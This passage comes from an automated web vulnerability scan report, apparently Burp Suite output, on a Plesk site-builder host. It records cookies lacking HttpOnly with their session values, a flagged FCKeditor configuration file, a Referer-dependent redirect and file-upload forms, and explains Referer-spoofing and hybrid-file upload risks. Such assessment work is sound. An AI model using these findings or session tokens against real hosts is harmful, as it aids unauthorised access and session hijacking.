GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_23.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_23.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:07:04 GMT
Connection: close

3.36. http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/skins/default/images/toolbar.buttonarrow.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/wysiwyg/custom/skins/default/images/toolbar.buttonarrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wysiwyg/custom/skins/default/images/toolbar.buttonarrow.gif HTTP/1.1
Accept: */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/fckeditor.wizard.html?cacheId=5.0.0.2009110318&currentPageId=q485ez4jvyq&editFilePath=/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php&InstanceName=wysiwyg&Toolbar=wizard
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fwysiwyg%2Fcustom%2Fskins%2Fdefault%2Fimages%2Ftoolbar.buttonarrow.gif
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:09:37 GMT
Connection: close

3.37. http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/skins/default/images/toolbar.start.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/wysiwyg/custom/skins/default/images/toolbar.start.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wysiwyg/custom/skins/default/images/toolbar.start.gif HTTP/1.1
Accept: */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/fckeditor.wizard.html?cacheId=5.0.0.2009110318&currentPageId=q485ez4jvyq&editFilePath=/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php&InstanceName=wysiwyg&Toolbar=wizard
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fwysiwyg%2Fcustom%2Fskins%2Fdefault%2Fimages%2Ftoolbar.start.gif
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:09:37 GMT
Connection: close

4. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/wysiwyg/fckconfig.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /wysiwyg/fckconfig.js?5.0.0.2009110318 HTTP/1.1
Accept: */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/wysiwyg/custom/fckeditor.wizard.html?cacheId=5.0.0.2009110318&currentPageId=q485ez4jvyq&editFilePath=/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php&InstanceName=wysiwyg&Toolbar=wizard
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 12 Nov 2008 10:35:32 GMT
Accept-Ranges: bytes
ETag: "0327163b244c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:09:13 GMT
Content-Length: 13745

.../*
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2008 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
* http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
* http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
* http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Editor configuration settings.
*
* Follow this link for more information:
* http://wiki.fckeditor.net/Developer%27s_Guide/Configuration/Configurations_Settings
*/

FCK_IMAGES_PATH = FCKConfig.BasePath + '../editor/images/';
FCK_SPACER_PATH = FCK_IMAGES_PATH + 'spacer.gif';

FCKConfig.CustomConfigurationsPath = '' ;

FCKConfig.EditorAreaCSS = FCKConfig.BasePath + 'css/fck_editorarea.css' ;
FCKConfig.EditorAreaStyles = '' ;
FCKConfig.ToolbarComboPreviewCSS = '' ;

FCKConfig.DocType = '' ;

FCKConfig.BaseHref = '' ;

FCKConfig.FullPage = false ;

// The following option determines whether the "Show Blocks" feature is enabled or not at startup.
FCKConfig.StartupShowBlocks = false ;

FCKConfig.Debug = false ;
FCKConfig.AllowQueryStringDebug = true ;

FCKConfig.SkinPath = FCKConfig.BasePath + 'skins/default/' ;
FCKConfig.SkinEditorCSS = '' ;    // FCKConfig.SkinPath + "|<minified css>" ;
FCKConfig.SkinDialogCSS = '' ;    // FCKConfig.SkinPath + "|<minified css>" ;

FCKConfig.PreloadImages = [ FCKConfig.SkinPath + 'images/toolbar.start.gif', FCKConfig.SkinPath + 'images/toolbar.buttonarrow.gif' ] ;

FCKConfig.PluginsPath = FCKConfig.BasePath + 'plugins/' ;

// FCKConfig.Plugins.Add( 'autogrow' ) ;
// FCKConfig.Plugins.Add( 'dragresizetable' );
FCKConfig.AutoGrowMax = 400 ;

// FCKConfig.ProtectedSource.Add( /<%[\s\S]*?%>/g ) ;    // ASP style server side code <%...%>
// FCKConfig.ProtectedSource.Add( /<\?[\s\S]*?\?>/g ) ;    // PHP style server side code
// FCKConfig.ProtectedSource.Add( /(<asp:[^\>]+>[\s|\S]*?<\/asp:[^\>]+>)|(<asp:[^\>]+\/>)/gi ) ;    // ASP.Net style tags <asp:control>

FCKConfig.AutoDetectLanguage    = true ;
FCKConfig.DefaultLanguage        = 'en' ;
FCKConfig.ContentLangDirection    = 'ltr' ;

FCKConfig.ProcessHTMLEntities    = true ;
FCKConfig.IncludeLatinEntities    = true ;
FCKConfig.IncludeGreekEntities    = true ;

FCKConfig.ProcessNumericEntities = false ;

FCKConfig.AdditionalNumericEntities = '' ;        // Single Quote: "'"

FCKConfig.FillEmptyBlocks    = true ;

FCKConfig.FormatSource        = true ;
FCKConfig.FormatOutput        = true ;
FCKConfig.FormatIndentator    = ' ' ;

FCKConfig.StartupFocus    = false ;
FCKConfig.ForcePasteAsPlainText    = false ;
FCKConfig.AutoDetectPasteFromWord = true ;    // IE only.
FCKConfig.ShowDropDialog = true ;
FCKConfig.ForceSimpleAmpersand    = false ;
FCKConfig.TabSpaces        = 0 ;
FCKConfig.ShowBorders    = true ;
FCKConfig.SourcePopup    = false ;
FCKConfig.ToolbarStartExpanded    = true ;
FCKConfig.ToolbarCanCollapse    = true ;
FCKConfig.IgnoreEmptyParagraphValue = true ;
FCKConfig.PreserveSessionOnFileBrowser = false ;
FCKConfig.FloatingPanelsZIndex = 10000 ;
FCKConfig.HtmlEncodeOutput = false ;

FCKConfig.TemplateReplaceAll = true ;
FCKConfig.TemplateReplaceCheckbox = true ;

FCKConfig.ToolbarLocation = 'In' ;

FCKConfig.ToolbarSets["Default"] = [
   ['Source','DocProps','-','Save','NewPage','Preview','-','Templates'],
   ['Cut','Copy','Paste','PasteText','PasteWord','-','Print','SpellCheck'],
   ['Undo','Redo','-','Find','Replace','-','SelectAll','RemoveFormat'],
   ['Form','Checkbox','Radio','TextField','Textarea','Select','Button','ImageButton','HiddenField'],
   '/',
   ['Bold','Italic','Underline','StrikeThrough','-','Subscript','Superscript'],
   ['OrderedList','UnorderedList','-','Outdent','Indent','Blockquote'],
   ['JustifyLeft','JustifyCenter','JustifyRight','JustifyFull'],
   ['Link','Unlink','Anchor'],
   ['Image','Flash','Table','Rule','Smiley','SpecialChar','PageBreak'],
   '/',
   ['Style','FontFormat','FontName','FontSize'],
   ['TextColor','BGColor'],
   ['FitWindow','ShowBlocks','-','About']        // No comma for the last row.
] ;

FCKConfig.ToolbarSets["Basic"] = [
   ['Bold','Italic','-','OrderedList','UnorderedList','-','Link','Unlink','-','About']
] ;

FCKConfig.EnterMode = 'br' ;            // p | div | br
FCKConfig.ShiftEnterMode = 'p' ;    // p | div | br

FCKConfig.Keystrokes = [
   [ CTRL + 65 /*A*/, true ],
   [ CTRL + 67 /*C*/, true ],
   [ CTRL + 70 /*F*/, true ],
   [ CTRL + 83 /*S*/, true ],
   [ CTRL + 84 /*T*/, true ],
   [ CTRL + 88 /*X*/, true ],
   [ CTRL + 86 /*V*/, 'Paste' ],
   [ CTRL + 45 /*INS*/, true ],
   [ SHIFT + 45 /*INS*/, 'Paste' ],
   [ CTRL + 88 /*X*/, 'Cut' ],
   [ SHIFT + 46 /*DEL*/, 'Cut' ],
   [ CTRL + 90 /*Z*/, 'Undo' ],
   [ CTRL + 89 /*Y*/, 'Redo' ],
   [ CTRL + SHIFT + 90 /*Z*/, 'Redo' ],
   [ CTRL + 76 /*L*/, 'Link' ],
   [ CTRL + 66 /*B*/, 'Bold' ],
   [ CTRL + 73 /*I*/, 'Italic' ],
   [ CTRL + 85 /*U*/, 'Underline' ],
   [ CTRL + SHIFT + 83 /*S*/, 'Save' ],
   [ CTRL + ALT + 13 /*ENTER*/, 'FitWindow' ]
] ;

FCKConfig.ContextMenu = ['Generic','Link','Anchor','Image','Flash','Select','Textarea','Checkbox','Radio','TextField','HiddenField','ImageButton','Button','BulletedList','NumberedList','Table','Form'] ;
FCKConfig.BrowserContextMenuOnCtrl = false ;

FCKConfig.EnableMoreFontColors = true ;
FCKConfig.FontColors = '000000,993300,333300,003300,003366,000080,333399,333333,800000,FF6600,808000,808080,008080,0000FF,666699,808080,FF0000,FF9900,99CC00,339966,33CCCC,3366FF,800080,999999,FF00FF,FFCC00,FFFF00,00FF00,00FFFF,00CCFF,993366,C0C0C0,FF99CC,FFCC99,FFFF99,CCFFCC,CCFFFF,99CCFF,CC99FF,FFFFFF' ;

FCKConfig.FontFormats    = 'p;h1;h2;h3;h4;h5;h6;pre;address;div' ;
FCKConfig.FontNames        = 'Arial;Comic Sans MS;Courier New;Tahoma;Times New Roman;Verdana' ;
FCKConfig.FontSizes        = 'smaller;larger;xx-small;x-small;small;medium;large;x-large;xx-large' ;

FCKConfig.StylesXmlPath        = FCKConfig.EditorPath + 'fckstyles.xml' ;
FCKConfig.TemplatesXmlPath    = FCKConfig.EditorPath + 'fcktemplates.xml' ;

FCKConfig.SpellChecker            = 'ieSpell' ;    // 'ieSpell' | 'SpellerPages'
FCKConfig.IeSpellDownloadUrl    = 'http://www.iespell.com/download.php' ;
FCKConfig.SpellerPagesServerScript = 'server-scripts/spellchecker.php' ;    // Available extension: .php .cfm .pl
FCKConfig.FirefoxSpellChecker    = false ;

FCKConfig.MaxUndoLevels = 15 ;

FCKConfig.DisableObjectResizing = false ;
FCKConfig.DisableFFTableHandles = true ;

FCKConfig.LinkDlgHideTarget        = false ;
FCKConfig.LinkDlgHideAdvanced    = false ;

FCKConfig.ImageDlgHideLink        = false ;
FCKConfig.ImageDlgHideAdvanced    = false ;

FCKConfig.FlashDlgHideAdvanced    = false ;

FCKConfig.ProtectedTags = '' ;

// This will be applied to the body element of the editor
FCKConfig.BodyId = '' ;
FCKConfig.BodyClass = '' ;

FCKConfig.DefaultStyleLabel = '' ;
FCKConfig.DefaultFontFormatLabel = '' ;
FCKConfig.DefaultFontLabel = '' ;
FCKConfig.DefaultFontSizeLabel = '' ;

FCKConfig.DefaultLinkTarget = '' ;

// The option switches between trying to keep the html structure or do the changes so the content looks like it was in Word
FCKConfig.CleanWordKeepsStructure = false ;

// Only inline elements are valid.
FCKConfig.RemoveFormatTags = 'b,big,code,del,dfn,em,font,i,ins,kbd,q,samp,small,span,strike,strong,sub,sup,tt,u,var' ;

// Attributes that will be removed
FCKConfig.RemoveAttributes = 'class,style,lang,width,height,align,hspace,valign' ;

FCKConfig.CustomStyles =
{
   'Red Title'    : { Element : 'h3', Styles : { 'color' : 'Red' } }
};

// Do not add, rename or remove styles here. Only apply definition changes.
FCKConfig.CoreStyles =
{
   // Basic Inline Styles.
   'Bold'            : { Element : 'strong', Overrides : 'b' },
   'Italic'        : { Element : 'em', Overrides : 'i' },
   'Underline'        : { Element : 'u' },
   'StrikeThrough'    : { Element : 'strike' },
   'Subscript'        : { Element : 'sub' },
   'Superscript'    : { Element : 'sup' },

   // Basic Block Styles (Font Format Combo).
   'p'                : { Element : 'p' },
   'div'            : { Element : 'div' },
   'pre'            : { Element : 'pre' },
   'address'        : { Element : 'address' },
   'h1'            : { Element : 'h1' },
   'h2'            : { Element : 'h2' },
   'h3'            : { Element : 'h3' },
   'h4'            : { Element : 'h4' },
   'h5'            : { Element : 'h5' },
   'h6'            : { Element : 'h6' },

   // Other formatting features.
   'FontFace' :
   {
       Element        : 'span',
       Styles        : { 'font-family' : '#("Font")' },
       Overrides    : [ { Element : 'font', Attributes : { 'face' : null } } ]
   },

   'Size' :
   {
       Element        : 'span',
       Styles        : { 'font-size' : '#("Size","fontSize")' },
       Overrides    : [ { Element : 'font', Attributes : { 'size' : null } } ]
   },

   'Color' :
   {
       Element        : 'span',
       Styles        : { 'color' : '#("Color","color")' },
       Overrides    : [ { Element : 'font', Attributes : { 'color' : null } } ]
   },

   'BackColor'        : { Element : 'span', Styles : { 'background-color' : '#("Color","color")' } },

   'SelectionHighlight' : { Element : 'span', Styles : { 'background-color' : 'navy', 'color' : 'white' } }
};

// The distance of an indentation step.
FCKConfig.IndentLength = 40 ;
FCKConfig.IndentUnit = 'px' ;

// Alternatively, FCKeditor allows the use of CSS classes for block indentation.
// This overrides the IndentLength/IndentUnit settings.
FCKConfig.IndentClasses = [] ;

// [ Left, Center, Right, Justified ]
FCKConfig.JustifyClasses = [] ;

// The following value defines which File Browser connector and Quick Upload
// "uploader" to use. It is valid for the default implementaion and it is here
// just to make this configuration file cleaner.
// It is not possible to change this value using an external file or even
// inline when creating the editor instance. In that cases you must set the
// values of LinkBrowserURL, ImageBrowserURL and so on.
// Custom implementations should just ignore it.
var _FileBrowserLanguage    = 'php' ;    // asp | aspx | cfm | lasso | perl | php | py
var _QuickUploadLanguage    = 'php' ;    // asp | aspx | cfm | lasso | perl | php | py

// Don't care about the following two lines. It just calculates the correct connector
// extension to use for the default File Browser (Perl uses "cgi").
var _FileBrowserExtension = _FileBrowserLanguage == 'perl' ? 'cgi' : _FileBrowserLanguage ;
var _QuickUploadExtension = _QuickUploadLanguage == 'perl' ? 'cgi' : _QuickUploadLanguage ;

FCKConfig.LinkBrowser = true ;
FCKConfig.LinkBrowserURL = FCKConfig.BasePath + 'filemanager/browser/default/browser.html?Connector=' + encodeURIComponent( FCKConfig.BasePath + 'filemanager/connectors/' + _FileBrowserLanguage + '/connector.' + _FileBrowserExtension ) ;
FCKConfig.LinkBrowserWindowWidth    = FCKConfig.ScreenWidth * 0.7 ;        // 70%
FCKConfig.LinkBrowserWindowHeight    = FCKConfig.ScreenHeight * 0.7 ;    // 70%

FCKConfig.ImageBrowser = true ;
FCKConfig.ImageBrowserURL = FCKConfig.BasePath + 'filemanager/browser/default/browser.html?Type=Image&Connector=' + encodeURIComponent( FCKConfig.BasePath + 'filemanager/connectors/' + _FileBrowserLanguage + '/connector.' + _FileBrowserExtension ) ;
FCKConfig.ImageBrowserWindowWidth = FCKConfig.ScreenWidth * 0.7 ;    // 70% ;
FCKConfig.ImageBrowserWindowHeight = FCKConfig.ScreenHeight * 0.7 ;    // 70% ;

FCKConfig.FlashBrowser = true ;
FCKConfig.FlashBrowserURL = FCKConfig.BasePath + 'filemanager/browser/default/browser.html?Type=Flash&Connector=' + encodeURIComponent( FCKConfig.BasePath + 'filemanager/connectors/' + _FileBrowserLanguage + '/connector.' + _FileBrowserExtension ) ;
FCKConfig.FlashBrowserWindowWidth = FCKConfig.ScreenWidth * 0.7 ;    //70% ;
FCKConfig.FlashBrowserWindowHeight = FCKConfig.ScreenHeight * 0.7 ;    //70% ;

FCKConfig.LinkUpload = true ;
FCKConfig.LinkUploadURL = FCKConfig.BasePath + 'filemanager/connectors/' + _QuickUploadLanguage + '/upload.' + _QuickUploadExtension ;
FCKConfig.LinkUploadAllowedExtensions    = ".(7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|png|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf|sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|xml|zip)$" ;            // empty for all
FCKConfig.LinkUploadDeniedExtensions    = "" ;    // empty for no one

FCKConfig.ImageUpload = true ;
FCKConfig.ImageUploadURL = FCKConfig.BasePath + 'filemanager/connectors/' + _QuickUploadLanguage + '/upload.' + _QuickUploadExtension + '?Type=Image' ;
FCKConfig.ImageUploadAllowedExtensions    = ".(jpg|gif|jpeg|png|bmp)$" ;        // empty for all
FCKConfig.ImageUploadDeniedExtensions    = "" ;                            // empty for no one

FCKConfig.FlashUpload = true ;
FCKConfig.FlashUploadURL = FCKConfig.BasePath + 'filemanager/connectors/' + _QuickUploadLanguage + '/upload.' + _QuickUploadExtension + '?Type=Flash' ;
FCKConfig.FlashUploadAllowedExtensions    = ".(swf|flv)$" ;        // empty for all
FCKConfig.FlashUploadDeniedExtensions    = "" ;                    // empty for no one

FCKConfig.SmileyPath    = FCKConfig.BasePath + 'images/smiley/msn/' ;
FCKConfig.SmileyImages    = ['regular_smile.gif','sad_smile.gif','wink_smile.gif','teeth_smile.gif','confused_smile.gif','tounge_smile.gif','embaressed_smile.gif','omg_smile.gif','whatchutalkingabout_smile.gif','angry_smile.gif','angel_smile.gif','shades_smile.gif','devil_smile.gif','cry_smile.gif','lightbulb.gif','thumbs_down.gif','thumbs_up.gif','heart.gif','broken_heart.gif','kiss.gif','envelope.gif'] ;
FCKConfig.SmileyColumns = 8 ;
FCKConfig.SmileyWindowWidth        = 320 ;
FCKConfig.SmileyWindowHeight    = 210 ;

FCKConfig.BackgroundBlockerColor = '#ffffff' ;
FCKConfig.BackgroundBlockerOpacity = 0.50 ;

5. Referer-dependent response previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/ImageGallery/Image/Edit

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /Wizard/Edit/Modules/ImageGallery/Image/Edit?id=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response 1

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:33:49 GMT
Connection: close

Request 2

GET /Wizard/Edit/Modules/ImageGallery/Image/Edit?id=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Wizard/Start
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:37:29 GMT
Connection: close

6. File upload functionality previous next
There are 3 instances of this issue:

/Wizard/Design
/Wizard/Edit/Modules/ImageGallery/Category/Add
/Wizard/Edit/Modules/ImageGallery/Category/Edit

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

File path traversal
Persistent cross-site scripting
Placing of other client-executable code into the domain
Transmission of viruses and other malware
Denial of service

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defence-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.

6.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Design previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Design

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Design

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

6.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Add previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Edit/Modules/ImageGallery/Category/Add

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Insert

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

Response

6.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Edit previous next

Summary

Severity:	Information
Confidence:	Certain
